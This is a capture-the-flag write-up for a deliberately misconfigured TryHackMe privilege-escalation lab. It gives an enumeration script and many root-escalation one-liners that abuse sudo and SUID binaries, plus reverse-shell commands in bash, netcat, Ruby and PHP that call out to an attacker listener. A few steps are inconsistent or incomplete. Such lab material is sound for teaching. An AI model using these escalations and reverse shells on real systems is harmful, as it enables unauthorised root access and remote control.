THM - Privesc playground
Check it out at TryHackMe Linux PrivEsc Playground
Room created by SherlockSec, TryHackMe profile or also on twitter @SherlockSec
Picture this: you've popped a reverse shell on some CTF box through some complicated exploit and grabbed the user flag, but then what? You need root! It's PrivEsc (Privilege Escalation) time.
This room has now been removed from TryHackMe by the creator. If you'd like to re-create it, just add the SUID bit to every binary in your PATH (and, to match the sudo -l output below, let your user run them all as root with NOPASSWD).
Enumerating
This box is designed to be really easy to get root on; the challenge is "How many ways can you find to PrivEsc to root?"
First, let's start with something super simple that normally only pays off in beginner/intermediate CTFs: find out which commands our user can run with sudo.
bash-4.2$ ls
bash-4.2$ whoami
user
bash-4.2$ sudo -l
Matching 'Defaults' entries for user on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user may run the following commands on this host:
(root) NOPASSWD: /bin/apt-get*, (root) /bin/apt*, (root)
/usr/bin/aria2c, (root) /usr/sbin/arp, (root) /bin/ash, (root)
/usr/bin/awk, (root) /usr/bin/base64, (root) /bin/bash, (root)
/bin/busybox, (root) /bin/cat, (root) /bin/chmod, (root) /bin/chown,
(root) /bin/cp, (root) /usr/bin/cpan, (root) /usr/bin/cpulimit, (root)
/bin/crontab, (root) /bin/csh, (root) /bin/curl, (root) /usr/bin/cut,
(root) /bin/dash, (root) /bin/date, (root) /bin/dd, (root)
/usr/bin/diff, (root) /bin/dmesg, (root) /sbin/dmsetup, (root)
/usr/bin/docker, (root) /usr/bin/dpkg, (root) /usr/bin/easy_install,
(root) /usr/bin/emacs, (root) /usr/bin/env, (root) /usr/bin/expand,
(root) /usr/bin/expect, (root) /usr/bin/facter, (root) /usr/bin/file,
(root) /usr/bin/find, (root) /usr/bin/flock, (root) /usr/bin/fmt,
(root) /usr/bin/fold, (root) /usr/bin/ftp, (root) /usr/bin/gawk,
(root) /usr/bin/gdb, (root) /usr/bin/gimp, (root) /usr/bin/git, (root)
/bin/grep, (root) /usr/bin/head, (root) /usr/sbin/iftop, (root)
/usr/bin/ionice, (root) /sbin/ip, (root) /usr/bin/irb, (root)
/usr/bin/jq, (root) /usr/bin/ksh, (root) /sbin/ldconfig, (root)
/usr/bin/less, (root) /sbin/logsave, (root) /usr/bin/ltrace, (root)
/usr/bin/lua, (root) /usr/bin/make, (root) /usr/bin/man, (root)
/usr/bin/mawk, (root) /bin/more, (root) /bin/mount, (root)
/usr/bin/mtr, (root) /bin/mv, (root) /usr/bin/nano, (root)
/usr/bin/nawk, (root) /bin/nc, (root) /usr/bin/nice, (root)
/usr/bin/nl, (root) /usr/bin/nmap, (root) /usr/sbin/node, (root)
/usr/bin/od, (root) /usr/bin/openssl, (root) /usr/bin/perl, (root)
/usr/bin/pg, (root) /usr/bin/php, (root) /usr/bin/pic, (root)
/usr/bin/pico, (root) /usr/bin/pip, (root) /usr/bin/puppet, (root)
/usr/bin/python, (root) /usr/bin/readelf, (root) /usr/bin/redm, (root)
/usr/bin/rlwrap, (root) /usr/bin/rsync, (root) /usr/bin/ruby, (root)
/usr/bin/run-mailcaps, (root) /bin/run-parts, (root) /usr/bin/rvim,
(root) /usr/bin/scp, (root) /usr/bin/screen, (root) /usr/bin/script,
(root) /bin/sed, (root) /usr/sbin/service, (root) /usr/bin/setarch,
(root) /usr/bin/sftp, (root) /usr/bin/smbclient, (root)
/usr/bin/socat, (root) /usr/bin/sort, (root) /usr/bin/sqlite3, (root)
/usr/bin/ssh, (root) /sbin/start-stop-daemon, (root) /usr/bin/stdbuf,
(root) /usr/bin/strace, (root) /usr/bin/tail, (root) /bin/tar, (root)
/usr/bin/taskset, (root) /usr/bin/tclsh, (root) /usr/sbin/tcpdump,
(root) /usr/bin/tee, (root) /usr/bin/telnet, (root) /usr/bin/tftp,
(root) /usr/bin/time, (root) /usr/bin/timeout, (root) /usr/bin/tmux,
(root) /usr/bin/ul, (root) /usr/bin/unexpand, (root) /usr/bin/uniq,
(root) /usr/bin/unshare, (root) /usr/bin/vi, (root) /usr/bin/vim,
(root) /usr/bin/watch, (root) /usr/bin/wget, (root) /usr/bin/xargs,
(root) /usr/bin/xxd, (root) /usr/bin/zip, (root) /usr/bin/zsh
Oh. Oh no. With so many binaries runnable via sudo, the question is where to start! The user's password isn't even needed: the NOPASSWD tag at the start of the command list applies to every entry that follows it, so all of these run as root without a prompt. Flags are censored so that you actually run them yourself!
The next step is to find interesting SUID binaries; several of the same utilities turn up again below, run without sudo at all.
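The two enumeration steps above (reading sudo -l and hunting for SUID binaries) are worth scripting. The helper below is an added example, not code from the room or its author: sudo_allowed pulls the allowed command paths out of sudo -l output, find_suid lists setuid/setgid files on disk, and flag_known marks anything on a small watch list of binaries that can give a shell or read files when run as root. The watch list, the function names and the default search root are my own assumptions.

```shell
#!/bin/sh
# Added example, not code from the room or its author. Enumerates sudo-allowed
# commands and SUID/SGID binaries and flags known escalation candidates.
# The watch list, function names and default paths are assumptions.

# Constructed watch list: binaries that can spawn a shell or read arbitrary files
# when they run as root (a subset of what this box's sudo -l output shows).
KNOWN_ESCALATORS="bash sh dash ash zsh ksh csh vim vi nano less more find awk perl python python2.7 ruby lua php php5 base64 xxd cp cat nc"

# sudo_allowed: read "sudo -l" output on stdin, print one allowed command path per line.
# Only lines after "may run the following commands" are considered, so the
# secure_path entry in the Defaults block is not mistaken for a command.
sudo_allowed() {
    awk '/may run the following commands/ { found = 1; next } found' \
    | grep -o '/[^ ,]*'
}

# find_suid: print regular files with the setuid or setgid bit under $1 (default /).
# -xdev keeps the scan on one filesystem; errors from unreadable directories are dropped.
find_suid() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# flag_known: read paths on stdin, print those whose basename is in KNOWN_ESCALATORS.
# A sudoers glob such as /bin/apt-get* keeps its trailing * and simply will not match.
flag_known() {
    while IFS= read -r path; do
        name=${path##*/}
        case " $KNOWN_ESCALATORS " in
            *" $name "*) printf '%s\n' "$path" ;;
        esac
    done
}

# Typical use on a target (with no arguments the script only defines the functions):
#   sudo -n -l 2>/dev/null | sudo_allowed | flag_known
#   find_suid / | flag_known
if [ "$#" -gt 0 ]; then
    find_suid "$1" | flag_known
fi
```

sudo -n -l is used so that a box which does require a password fails fast instead of hanging on a prompt; the output can also be saved to a file and piped in later.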
"Normal" Linux Utils
cp
bash-4.2$ sudo cp /root/flag.txt ~/flag.txt
bash-4.2$ ls
flag.txt
bash-4.2$ cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
cat
bash-4.2$ sudo cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
base64 - sudo is technically optional here, as /usr/bin/base64 has the SUID bit set and so reads /root/flag.txt with root's effective UID.
bash-4.2$ sudo base64 /root/flag.txt > /home/user/flag.b64
bash-4.2$ base64 -d flag.b64
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
bash-4.2$ base64 /root/flag.txt > /home/user/flag.b64
bash-4.2$ base64 -d flag.b64
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
xxd - with and without sudo. The SUID bit is set on /usr/bin/xxd.
bash-4.2$ sudo xxd /root/flag.txt
0000000: 436f 6e67 7261 7475 6c61 7469 6f6e 7321 Congratulations!
0000010: 2059 6f75 2067 6f74 2074 6865 2065 6173 You got the eas
0000020: 6965 7374 2066 6c61 6720 6f6e 2054 484d iest flag on THM
0000030: 210a 0a54 484d 7b33 6173 795f 6631 3467 !..THM{*********
0000040: 5f31 6d34 307d 0a0a 4e6f 7720 676f 2070 *****}..Now go p
0000050: 7269 7620 6573 6320 736f 6d65 206d 6f72 riv esc some mor
0000060: 6521 0a e!.
bash-4.2$ xxd /root/flag.txt
0000000: 436f 6e67 7261 7475 6c61 7469 6f6e 7321 Congratulations!
0000010: 2059 6f75 2067 6f74 2074 6865 2065 6173 You got the eas
0000020: 6965 7374 2066 6c61 6720 6f6e 2054 484d iest flag on THM
0000030: 210a 0a54 484d 7b33 6173 795f 6631 3467 !..THM{*********
0000040: 5f31 6d34 307d 0a0a 4e6f 7720 676f 2070 *****}..Now go p
0000050: 7269 7620 6573 6320 736f 6d65 206d 6f72 riv esc some mor
0000060: 6521 0a e!.
less/more - both pagers can also run commands (type !sh at the pager prompt), so beyond reading the file they give a full root shell.
bash-4.2$ sudo less /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
/root/flag.txt (END)
bash-4.2$ sudo more /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Nano
bash-4.2$ sudo nano /root/flag.txt
GNU nano 2.2.6 File: /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Vim (and vi etc.) - :sh (or :!sh) drops to a shell running as the editor's user, which here is root.
bash-4.2$ sudo vim
~
~
:sh
root@privesc:~# whoami
root
root@privesc:~# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Shells
bash
bash-4.2$ sudo bash
root@privesc:~# ls
flag.txt
root@privesc:~# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
root@privesc:~#
zsh
bash-4.2$ sudo zsh
privesc# whoami
root
privesc# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
ash
bash-4.2$ sudo ash
# whoami
root
# ls
flag.txt
# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
ksh
bash-4.2$ sudo ksh
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
dash
bash-4.2$ sudo dash
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
csh
bash-4.2$ sudo csh
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Programming/Scripting Languages
Python
bash-4.2$ sudo python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Python 2.7 also works without sudo, as /usr/bin/python2.7 has the SUID bit set. One caveat worth knowing: a SUID interpreter only gives the process an effective UID of 0, and a shell that drops privileges when its effective and real UIDs differ (bash does, unless started with -p) would come back as the unprivileged user. On this box /bin/sh keeps the effective UID, as the whoami output shows; elsewhere call os.setuid(0) before spawning, or spawn sh with -p.
bash-4.2$ python2.7 -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Perl
bash-4.2$ sudo perl -e 'exec "/bin/sh";'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Lua
bash-4.2$ sudo lua
Lua 5.0.3 Copyright (C) 1994-2006 Tecgraf, PUC-Rio
> os.execute('/bin/sh')
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{*************}
Now go priv esc some more!
Ruby IRB
bash-4.2$ sudo irb
irb(main):001:0> exec("/bin/bash")
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Ruby
bash-4.2$ sudo ruby -e 'exec "/bin/sh"'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Reverse Shells
Pure bash
bash-4.2$ sudo bash -i >& /dev/tcp/10.x.x.x/4444 0>&1
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43367
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Netcat
bash-4.2$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43369
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Ruby
bash-4.2$ sudo ruby -rsocket -e'f=TCPSocket.open("10.x.x.x",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43371
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
PHP
This one is slightly more interesting: PHP runs as root here without sudo, because the php alternatives symlink resolves to /usr/bin/php5 and that binary has the SUID bit set (the s in -rwsr-xr-x), as the ls output below, run from /usr/bin, shows.
bash-4.2$ ls -lah | grep php
lrwxrwxrwx 1 root root 21 Nov 27 19:59 php -> /etc/alternatives/php
-rwsr-xr-x 1 root root 7.8M Feb 13 2017 php5
bash-4.2$ php -r '$sock=fsockopen("10.8.6.110",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43371
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Python 2.7 reverse shell, again without sudo, since /usr/bin/python2.7 has the SUID bit set.
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.6.110] from (UNKNOWN) [10.10.32.113] 43374
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!